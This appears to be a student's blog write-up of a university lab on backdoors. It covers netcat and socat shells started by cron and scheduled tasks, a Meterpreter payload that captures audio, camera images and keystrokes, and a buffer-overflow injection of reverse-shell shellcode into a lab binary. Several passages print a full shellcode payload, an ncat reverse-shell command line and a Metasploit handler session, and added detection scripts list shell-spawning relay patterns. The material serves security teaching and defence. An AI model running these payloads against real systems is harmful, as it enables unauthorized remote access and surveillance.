Exp2 Backdoor Principles and Practice

Foreword

The experiment took three days in total, and all five parts were completed. Two problems remain unresolved. First, when the Windows cmd window receives data from Linux through nc, a transcoding error occurs; this may be an inherent shortcoming of Windows. I tried changing the encoding on both ends but could not fix it. Second, in part five I failed to get the shellcode reverse shell working between two connected virtual machines; I only managed the injection between different terminals on a single host, probably because of a problem in the network part of my shellcode settings.

Last time I said I wanted to get the experiment done quickly, but it still dragged on.

This time I mainly wasted too much time changing the Chinese encoding, and while setting up shared folders I nearly broke the Linux system; after that the experiments repeatedly got stuck for strange reasons.

Experiment contents

Use netcat to get the host's shell, started by cron


Chinese text was garbled here, but it does not affect the function; I will try to deal with it later on.

Use socat to get the host's shell, started by a scheduled task

Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, and run it to get the host's shell

Use MSF meterpreter (or other software) to generate a payload for the target host to obtain audio, camera images, keystroke records, etc., and try privilege escalation




Optional extra credit: use MSF to generate shellcode, inject it into pwn1 from Practice 1, obtain a reverse shell connection, and write it up together with this experiment's report.

Experiment summary and experience

Most of the experiments in this lab were performed under ideal conditions. After completing them, I have the following takeaways:

(1) Be wary of software from unknown sources; as the old saying goes, "unsolicited favours mean either a swindle or a theft". Software should be downloaded from the official website. Installation packages from pirated-software download sites are hard to verify as safe, and even with security software installed it is hard to guarantee the computer's safety.

(2) Network attacks have become integrated, systematic and simplified. With integrated software and "personalized" attack settings, network attack is no longer the specialty of a few professionals in the discipline. Our country has enacted laws and regulations on information security, but at the individual level we still need to maintain a high awareness of information security.

(3) Beyond implanted backdoors, backdoors built into hardware and software themselves are frightening. Production equipment must be independent and reliable in terms of information security; that is the large project we have been working on, and it matters for our national security.

(4) Information security is passive: the traces of network attacks are hard to track, much like the theory of confidentiality. To ensure information security we must carry out scientific management; technology and institutional systems are both indispensable, so that information is protected across the whole life cycle of the system.

(5) After completing the experiment, if you think you have fully mastered the principle and executed each step exactly, have confidence in yourself: break the experiment down into a summary of its steps, comb through the details of each step and do it again. If it still fails, pay special attention to the system prompts, or consider other possibilities.

Ramblings ×3

[1] I started the experiment with the Defender firewall turned off, but forgot to turn off Huorong (火绒) as well. I had set Huorong's alerts to silent, so I only saw its message when clicking the icon. After repeating several times I found that the backdoor software was being killed again and again, really sad TT. Here is my Huorong kill record:

【1】病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.d, 已处理

操作进程:C:\WINDOWS\system32\cmd.exe
病毒路径:C:\Users\Peter Don\exp2-20174306.exe
病毒名称:Backdoor/Meterpreter.d
病毒ID:E9028FFC12855C68
操作结果:已处理

【3】网络防护,僵尸网络防护,受到192.168.124.113的网络攻击,已阻止

关联进程:D:\NETEXP2\ncat\ncat.exe
命令行:D:\NETEXP2\ncat\ncat.exe -e cmd.exe 192.168.124.113 4306
攻击方式:Backdoor/WinCMD
远程地址:192.168.124.113:4306
本地地址:192.168.124.106:56798
防御结果:已阻止

[2] I spent a whole afternoon not finding where the file transferred by nc had landed. Other students' files were in the original folder, but for me they were in the user directory on the C drive. I repeated it several times and even tried other methods such as UDP transfer, until I remembered to look carefully at the "virus path" in the Huorong kill record above and finally found a pile of transferred files on the computer. Tears.

PS: the experiment files were all removed, partly killed by Huorong, and partly .exe files that were not fully written during transfer, which I deleted.
[3] A flow chart or diagram can be used to break down the experiment process. For example, for the final virtual-machine shellcode injection I broke it down into eight parts:
disassemble the source file to check it is complete (because once the pwn file I used in the experiment had been tampered with, so foo could not be found during analysis);
set up the stack (after cloning the virtual machine or replacing the file, it goes wrong if this is not set);
write the shellcode;
run it in a second terminal and analyze with grep and gdb to find the address for getting the shell;
open the listener;
inject;
test.
After repeated failed tests, the last time I did a careful test, and it succeeded!

Reflection

(1) What possible ways can you think of for a backdoor to enter your system?

In sophomore year I learned about and practised with the Gray Pigeon (灰鸽子) program, also a kind of backdoor software, which exploits the MS06014 **** vulnerability. I also came into contact with the follow-up remote control. [image: Gray Pigeon]

(2) Can you give examples of ways a backdoor starts itself (on Windows and Linux)?

Starting at boot, disguising itself as a system service, bundling with normal software, deceiving security software, and so on.

Rambling No.2: Gray Pigeon disguises itself as a system service. Before this, by looking through the system services, I shut down some pop-up ads that the antivirus could never clean up. For example, Adobe Acrobat Reader, the PDF reader, downloaded from the official Chinese website: Adobe gave the rights to this software in China to a company in Hangzhou, and the genuine software on the official website actually comes bundled with pop-up advertising. I checked the service, found the exe's location, deleted it, and the world was clean from then on.

(3) Which features of Meterpreter impressed you?

"Personalized" backdoors and "customized services" greatly reduce the difficulty of a network attack, but greatly increase the complexity of the backdoor.

(4) How do you find out whether a backdoor has been installed on your system?

The most direct way is security software (but not the safest!). You can also check whether there are open ports that should not be there, large port scans or strange connections, or do packet-capture analysis.
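As an added example (not part of the original post), the following script turns the "strange connection" check above into code: it walks constructed netstat-style lines and a PID-to-command-line table, modelled on the Huorong record earlier on this page (ncat.exe -e cmd.exe connecting out to 192.168.124.113:4306), and flags sockets owned by a relay tool that hands a shell to the other end. The sample lines and PIDs are constructed, not taken from a real machine.

```python
# Added example, not from the original post: a defender-side check for sockets
# owned by nc/ncat/socat-style relays that spawn a shell, which is exactly the
# shape of connection Huorong reported above. Sample data is constructed.
import re

# Constructed sample laid out like `netstat -ano` on Windows:
# proto, local address, remote address, state, owning PID.
NETSTAT_SAMPLE = """\
TCP    192.168.124.106:56798   192.168.124.113:4306    ESTABLISHED     3112
TCP    192.168.124.106:49722   40.90.22.184:443        ESTABLISHED     2040
TCP    0.0.0.0:4306            0.0.0.0:0               LISTENING       3320
TCP    127.0.0.1:49670         127.0.0.1:49671         ESTABLISHED     1208
"""

# Constructed PID -> command line table, as `wmic process get ProcessId,CommandLine`
# (or Huorong's 关联进程/命令行 fields) would show it.
CMDLINES = {
    3112: r"D:\NETEXP2\ncat\ncat.exe -e cmd.exe 192.168.124.113 4306",
    2040: r"C:\Program Files\Mozilla Firefox\firefox.exe",
    3320: r"C:\tools\socat.exe tcp-listen:4306,reuseaddr exec:cmd.exe,pty,stderr",
    1208: r"C:\Windows\System32\svchost.exe -k netsvcs",
}

# A relay binary name at the start of the command line or after a path separator.
RELAY_TOOLS = re.compile(r"(?:^|\\|/)(nc|ncat|netcat|socat)(?:\.exe)?\b", re.I)
# Options that hand a shell to the socket: nc/ncat -e/-c/--exec, socat exec:.
SHELL_HOOK = re.compile(r"(?:-e|-c|--exec|exec:)\s*\S*(cmd|powershell|bash|sh)", re.I)


def parse_netstat(text):
    """Yield (proto, local, remote, state, pid) from netstat -ano style lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] in ("TCP", "UDP"):
            yield parts[0], parts[1], parts[2], parts[3], int(parts[4])


def suspicious_connections(netstat_text, cmdlines):
    """Return [(pid, address, reason)] for sockets owned by a relay tool.

    For an established connection the reported address is the remote end (the
    likely operator); for a listener it is the local bind address. PIDs with no
    known command line are skipped rather than guessed."""
    findings = []
    for proto, local, remote, state, pid in parse_netstat(netstat_text):
        cmd = cmdlines.get(pid, "")
        if not RELAY_TOOLS.search(cmd):
            continue
        where = remote if state == "ESTABLISHED" else local
        if SHELL_HOOK.search(cmd):
            findings.append((pid, where, "relay tool spawning a shell: " + cmd))
        else:
            findings.append((pid, where, "relay tool with a socket open: " + cmd))
    return findings


if __name__ == "__main__":
    for pid, where, reason in suspicious_connections(NETSTAT_SAMPLE, CMDLINES):
        print(f"PID {pid} <-> {where}: {reason}")
```

On a real host the same logic applies to `ss -tnp` output on Linux, where the cron- or socat-started backdoor from the earlier parts would show up as an nc or socat process owning the socket.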

Practice record

Rambling No.3: I took 60 screenshots in total; several of them are named "the last time XXX". The cnblogs image insertion does not display the picture, and after inserting, the cursor automatically jumps back; some big pictures also have to be shrunk, which is very annoying, probably because there are too many pictures. When editing, it also occasionally swallows a picture.

Use netcat to get the host's shell, started by cron


The first time I did it, I forgot to close the Linux firewall and Windows Defender; after turning them off it worked. Actually, by the third part I had forgotten that I still had Huorong running. In between I also tried pinging from both sides.




Here I tried to solve the garbled-text problem. The problem first appeared on the Linux terminal: if the data transmitted is not in the format the Linux end expects, it shows up garbled there first.

At first I did not think it through clearly and searched online for ways to modify the Linux side; some of them also required changing files, and none succeeded. After careful consideration I think the problem is on the Windows side. Searching online, there is indeed such a view, and I think other students have the same garbled window as me. I made the modifications shown in the following blog, but nothing changed and I do not know why; normally I would change the cmd encoding from Chinese to UTF-8.
Running chcp in cmd shows the current code page:
[image: chcp output]
The number 936 corresponds to GBK encoding. chcp followed by a code page number sets cmd to that encoding; for example, chcp 65001 sets UTF-8.
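As an added illustration (not part of the original post), the script below reproduces the garbling described above with Python's codecs: UTF-8 bytes from the Linux side decoded by a cmd window on code page 936 (GBK), and GBK bytes from cmd decoded by a UTF-8 Linux terminal. It shows why switching the Windows side to 65001 fixes the display and why one direction of the garbling can be undone after the fact while the other cannot. All sample strings are constructed.

```python
# Added example, not from the original post: what each end of the nc session
# displays when the two sides use different encodings. Constructed samples.
CODE_PAGES = {936: "gbk", 65001: "utf-8"}   # the two chcp values discussed above


def linux_sends(text: str) -> bytes:
    """The Linux end writes UTF-8 bytes to the socket; it has no code page."""
    return text.encode("utf-8")


def windows_sends(text: str) -> bytes:
    """cmd.exe on code page 936 writes GBK bytes (e.g. the output of `dir`)."""
    return text.encode("gbk")


def shown_in_cmd(raw: bytes, chcp: int) -> str:
    """What a cmd window on code page `chcp` displays for the received bytes.
    Bytes that do not decode are replaced by U+FFFD, like the '?' on screen."""
    return raw.decode(CODE_PAGES[chcp], errors="replace")


def shown_in_linux_terminal(raw: bytes) -> str:
    """A UTF-8 terminal on the Linux side displaying bytes sent by cmd."""
    return raw.decode("utf-8", errors="replace")


def recover_utf8_from_gbk_display(shown: str):
    """Undo the mis-decoding of UTF-8 text as GBK.

    Every pair of UTF-8 bytes for CJK text happens to form a valid GBK
    character, so the display is wrong but lossless and can be reversed.
    Returns None when information was lost (a replacement char is present,
    or the round trip does not produce valid UTF-8)."""
    if "\ufffd" in shown:
        return None
    try:
        return shown.encode("gbk").decode("utf-8")
    except UnicodeError:
        return None


if __name__ == "__main__":
    msg = "文件格式 elf32-i386"          # constructed sample line from the Linux side
    raw = linux_sends(msg)
    print("cmd on 936  :", shown_in_cmd(raw, 936))      # garbled but reversible
    print("cmd on 65001:", shown_in_cmd(raw, 65001))    # correct after chcp 65001
    print("recovered   :", recover_utf8_from_gbk_display(shown_in_cmd(raw, 936)))
    back = shown_in_linux_terminal(windows_sends("文件格式"))
    print("linux sees  :", back)                        # lossy: U+FFFD, not reversible
    print("recovered   :", recover_utf8_from_gbk_display(back))
```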

Use socat to get the host's shell, started by a scheduled task




This part went so smoothly that I thought the experiment would be over soon :)

Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, and run it to get the host's shell

Generating the backdoor

The file transfer showed a response (in fact it had succeeded, and the file may then have been killed by Huorong), but I could not find the file. I tried ping: no problem.

I tried UDP: no response either.

Found the Huorong kill record.

Disappointed not to find it, but why was the interface exactly the same as a successful one, and information could still be passed?

After a little trial and error I thought of the Huorong record, and found a whole family of files :)

Use MSF meterpreter (or other software) to generate a payload for the target host to obtain audio, camera images, keystroke records, etc., and try privilege escalation




Also very smooth; the effect is quite frightening. The results were already shown in the first part.

Optional extra credit: use MSF to generate shellcode, inject it into pwn1 from Practice 1, obtain a reverse shell connection, and write it up together with this experiment's report.

At first I wanted to do the injection between two virtual machines, but failed; it kept reporting errors. Judging from the final results, my shellcode may have been wrong, and the address obtained after subtracting from foo may have been wrong too, but I only found these errors after I had given up, and finally had time to do the injection on a single machine.

Here is part of the attempt using an nc connection; I drew a sketch, but in the end it did not succeed.

I did not expect to be stuck for so long on injection between two terminals of the same machine. At first the executable file was wrong; later some settings may not have been filled in on the cloned virtual machine; and in the end the shellcode settings may have been wrong.

Thinking about it, I may have been impatient at the end and did not analyze the complete process in detail. Fortunately, the last time I calmed down, did it again, and it succeeded. Very frustrating.

First I checked the executable:

The shellcode:

The end result:

Good news: it worked!

The final shellcode:
perl -e 'print "A" x 32;print"\x01\x02\x03\x04\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode
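As an added analysis example (not part of the original post), the script below reads the 96 shellcode bytes from the input_shellcode above the way a defender would examine a captured payload, and recovers the connect-back address and port from the sockaddr_in it builds. It assumes the layout of the linux/x86/shell_reverse_tcp stub shown on this page: the IPv4 address is loaded XOR-encoded (mov eax, imm32; xor eax, -1; push eax) and the port is pushed as a 16-bit immediate right before push word 2 (AF_INET); a plain push imm32 of the address is handled as a fallback.

```python
# Added analysis example, not from the original post: pull the connect-back
# address and port out of the reverse-shell stub above. Byte patterns are
# specific to the Metasploit linux/x86 reverse_tcp layout visible on this page.
import re
import struct

# The shellcode bytes from input_shellcode, after the 32 'A's and the 4-byte
# return address (offsets 0x24..0x83 in the xxd dump on this page).
SHELLCODE = bytes.fromhex(
    "31c031db31c931d266b86701b302b101"
    "cd8089c3b880fffffe83f0ff50666811"
    "5c666a0289e1b21031c066b86a01cd80"
    "85c0752431c9b10231c0b03fcd804979"
    "f931c050682f2f7368682f62696e89e3"
    "31c931d2b00bcd80b30131c0b001cd80"
)

# push word imm16 (66 68 pp pp) immediately followed by push word 2 (66 6a 02)
PORT_PUSH = re.compile(rb"\x66\x68(..)\x66\x6a\x02", re.S)
# ... preceded by: mov eax, imm32 (b8 ....) ; xor eax, 0xffffffff (83 f0 ff) ; push eax (50)
XOR_IP_TAIL = re.compile(rb"\xb8(....)\x83\xf0\xff\x50\Z", re.S)
# ... or by a plain push imm32 (68 ....) when the address has no zero byte
PLAIN_IP_TAIL = re.compile(rb"\x68(....)\Z", re.S)


def extract_connect_back(code: bytes):
    """Return (ip, port) from the sockaddr_in construction, or None if the
    expected instruction sequence is not present."""
    m = PORT_PUSH.search(code)
    if not m:
        return None
    port = struct.unpack(">H", m.group(1))[0]      # sin_port is pushed big-endian
    before = code[:m.start()]                       # bytes up to the port push
    x = XOR_IP_TAIL.search(before)
    if x:
        # xor eax, -1 undoes the encoding; push eax lays the bytes out in
        # memory little-endian, which is the order sin_addr uses.
        val = struct.unpack("<I", x.group(1))[0] ^ 0xFFFFFFFF
        ip_bytes = struct.pack("<I", val)
    else:
        p = PLAIN_IP_TAIL.search(before)
        if not p:
            return None
        ip_bytes = p.group(1)
    return ".".join(str(b) for b in ip_bytes), port


def has_execve_binsh(code: bytes) -> bool:
    """True if the stub also pushes "//sh" and "/bin" and calls execve
    (mov al, 0x0b ; int 0x80), i.e. it hands the socket to a shell."""
    return b"//sh" in code and b"/bin" in code and b"\xb0\x0b\xcd\x80" in code


if __name__ == "__main__":
    print("connects back to:", extract_connect_back(SHELLCODE))
    print("spawns /bin/sh  :", has_execve_binsh(SHELLCODE))
```

On the bytes above this yields 127.0.0.1 and port 4444, which is exactly the LHOST/LPORT the multi/handler listener is started with in Terminal B below.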

The two terminals of the final run, with the occasional error:

Terminal A:

cyh20174306@kali:~$ cd exp1
cyh20174306@kali:~/exp1$ ls
20174306exp1 exp12 exp20174306 input pwn3
exp11 exp13-20174306 exp2-20174306 input_shellcode tset_from_15
cyh20174306@kali:~/exp1$ objdump -d 20174306exp1 | more

20174306exp1: 文件格式 elf32-i386

Disassembly of section .init:

(disassembly omitted here; foo, getShell and main kept)

0804847d <getShell>:
804847d: 55 push %ebp
804847e: 89 e5 mov %esp,%ebp
8048480: 83 ec 18 sub $0x18,%esp
8048483: c7 04 24 60 85 04 08 movl $0x8048560,(%esp)
804848a: e8 c1 fe ff ff call 8048350 <system@plt>
804848f: c9 leave
8048490: c3 ret

08048491 <foo>:
8048491: 55 push %ebp
8048492: 89 e5 mov %esp,%ebp
8048494: 83 ec 38 sub $0x38,%esp
8048497: 8d 45 e4 lea -0x1c(%ebp),%eax
804849a: 89 04 24 mov %eax,(%esp)
804849d: e8 8e fe ff ff call 8048330 <gets@plt>
80484a2: 8d 45 e4 lea -0x1c(%ebp),%eax
80484a5: 89 04 24 mov %eax,(%esp)
80484a8: e8 93 fe ff ff call 8048340 <puts@plt>
80484ad: c9 leave
80484ae: c3 ret

080484af <main>:
80484af: 55 push %ebp
80484b0: 89 e5 mov %esp,%ebp
80484b2: 83 e4 f0 and $0xfffffff0,%esp
80484b5: e8 d7 ff ff ff call 8048491 <foo>
80484ba: b8 00 00 00 00 mov $0x0,%eax
80484bf: c9 leave
80484c0: c3 ret
80484c1: 66 90 xchg %ax,%ax
80484c3: 66 90 xchg %ax,%ax
80484c5: 66 90 xchg %ax,%ax
80484c7: 66 90 xchg %ax,%ax
80484c9: 66 90 xchg %ax,%ax
80484cb: 66 90 xchg %ax,%ax
80484cd: 66 90 xchg %ax,%ax
80484cf: 90 nop

cyh20174306@kali:~/exp1$ execstack -s 20174306exp1
cyh20174306@kali:~/exp1$ execstack -q 20174306exp1
X 20174306exp1
cyh20174306@kali:~/exp1$ more /proc/sys/kernel/randomize_va_space
0
cyh20174306@kali:~/exp1$ su root
密码:
root@kali:/home/cyh20174306/exp1# echo "0" > /proc/sys/kernel/randomize_va_space
root@kali:/home/cyh20174306/exp1# more /proc/sys/kernel/randomize_va_space
0
root@kali:/home/cyh20174306/exp1# perl -e 'print "A" x 32;print"\x01\x02\x03\x04\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode
root@kali:/home/cyh20174306/exp1# xxd input_shellcode
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000020: 0102 0304 31c0 31db 31c9 31d2 66b8 6701 ....1.1.1.1.f.g.
00000030: b302 b101 cd80 89c3 b880 ffff fe83 f0ff ................
00000040: 5066 6811 5c66 6a02 89e1 b210 31c0 66b8 Pfh.\fj.....1.f.
00000050: 6a01 cd80 85c0 7524 31c9 b102 31c0 b03f j.....u$1...1..?
00000060: cd80 4979 f931 c050 682f 2f73 6868 2f62 ..Iy.1.Ph//shh/b
00000070: 696e 89e3 31c9 31d2 b00b cd80 b301 31c0 in..1.1.......1.
00000080: b001 cd80 ....
root@kali:/home/cyh20174306/exp1# (cat input_shellcode;cat) | ./20174306exp1

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1�1�1�1�f�g��̀�ø�������Pfh\fj��1�f�j̀��u$1ɱ1��?̀Iy�1�Ph//shh/bin��1�1Ұ
�1��̀

段错误
root@kali:/home/cyh20174306/exp1# (cat input_shellcode;cat) | ./20174306exp1

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1�1�1�1�f�g��̀�ø�������Pfh\fj��1�f�j̀��u$1ɱ1��?̀Iy�1�Ph//shh/bin��1�1Ұ
�1��̀

段错误
root@kali:/home/cyh20174306/exp1# ^C
root@kali:/home/cyh20174306/exp1# (cat input_shellcode;cat) | ./20174306exp1

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����1�1�1�1�f�g��̀�ø�������Pfh\fj��1�f�j̀��u$1ɱ1��?̀Iy�1�Ph//shh/bin��1�1Ұ
�1��̀

Terminal B:

cyh20174306@kali:~/exp1$ ps -ef | grep 20174306exp1
root 4659 4602 0 19:32 pts/0 00:00:00 ./20174306exp1
cyh2017+ 4663 4655 0 19:32 pts/1 00:00:00 grep 20174306exp1
cyh20174306@kali:~/exp1$ gdb
GNU gdb (Debian 8.2-1) 8.2
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) quit
cyh20174306@kali:~/exp1$ su root
密码:
root@kali:/home/cyh20174306/exp1# gdb
GNU gdb (Debian 8.2-1) 8.2
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) attach 4659
Attaching to process 4659
Reading symbols from /home/cyh20174306/exp1/20174306exp1...(no debugging symbols found)...done.
Reading symbols from /lib32/libc.so.6...(no debugging symbols found)...done.
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
0xf7fd3079 in __kernel_vsyscall ()
(gdb) disassemble foo
Dump of assembler code for function foo:
0x08048491 <+0>: push %ebp
0x08048492 <+1>: mov %esp,%ebp
0x08048494 <+3>: sub $0x38,%esp
0x08048497 <+6>: lea -0x1c(%ebp),%eax
0x0804849a <+9>: mov %eax,(%esp)
0x0804849d <+12>: call 0x8048330 <gets@plt>
0x080484a2 <+17>: lea -0x1c(%ebp),%eax
0x080484a5 <+20>: mov %eax,(%esp)
0x080484a8 <+23>: call 0x8048340 <puts@plt>
0x080484ad <+28>: leave
0x080484ae <+29>: ret
End of assembler dump.
(gdb) break *0x080484ae
Breakpoint 1 at 0x80484ae
(gdb) c
Continuing.

Breakpoint 1, 0x080484ae in foo ()
(gdb) info r esp
esp 0xffffd2dc 0xffffd2dc
(gdb) x/16x 0xffffd2dc
0xffffd2dc: 0x04030201 0xdb31c031 0xd231c931 0x0167b866
0xffffd2ec: 0x01b102b3 0xc38980cd 0xffff80b8 0xfff083fe
0xffffd2fc: 0x11686650 0x026a665c 0x10b2e189 0xb866c031
0xffffd30c: 0x80cd016a 0x2475c085 0x02b1c931 0x3fb0c031
(gdb) quit
A debugging session is active.

Inferior 1 [process 4659] will be detached.

Quit anyway? (y or n) y
Detaching from program: /home/cyh20174306/exp1/20174306exp1, process 4659
[Inferior 1 (process 4659) detached]
root@kali:/home/cyh20174306/exp1# perl -e 'print "A" x 32;print"\xe0\xd2\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode
root@kali:/home/cyh20174306/exp1# xxd input_shellcode
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000020: e0d2 ffff 31c0 31db 31c9 31d2 66b8 6701 ....1.1.1.1.f.g.
00000030: b302 b101 cd80 89c3 b880 ffff fe83 f0ff ................
00000040: 5066 6811 5c66 6a02 89e1 b210 31c0 66b8 Pfh.\fj.....1.f.
00000050: 6a01 cd80 85c0 7524 31c9 b102 31c0 b03f j.....u$1...1..?
00000060: cd80 4979 f931 c050 682f 2f73 6868 2f62 ..Iy.1.Ph//shh/b
00000070: 696e 89e3 31c9 31d2 b00b cd80 b301 31c0 in..1.1.......1.
00000080: b001 cd80 ....
root@kali:/home/cyh20174306/exp1# msfconsole
[-] ***rting the Metasploit Framework console...| [-] * WARNING: No database support: No database YAML file [-] ***


I love shells --egypt

       =[ metasploit v5.0.2-dev                           ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


Payload options (linux/x86/shell_reverse_tcp):

Name Current Setting Required Description


CMD /bin/sh yes The command string to execute
LHOST 127.0.0.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Wildcard Target

msf5 exploit(multi/handler) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55074) at 2020-03-22 19:41:38 +0800

ls
20174306exp1
exp11
exp12
exp13-20174306
exp2-20174306
exp20174306
input
input_shellcode
pwn3
tset_from_15
End of this post. Thank you!


Source: www.cnblogs.com/PeterDon-WorkHardPlayHard/p/12549284.html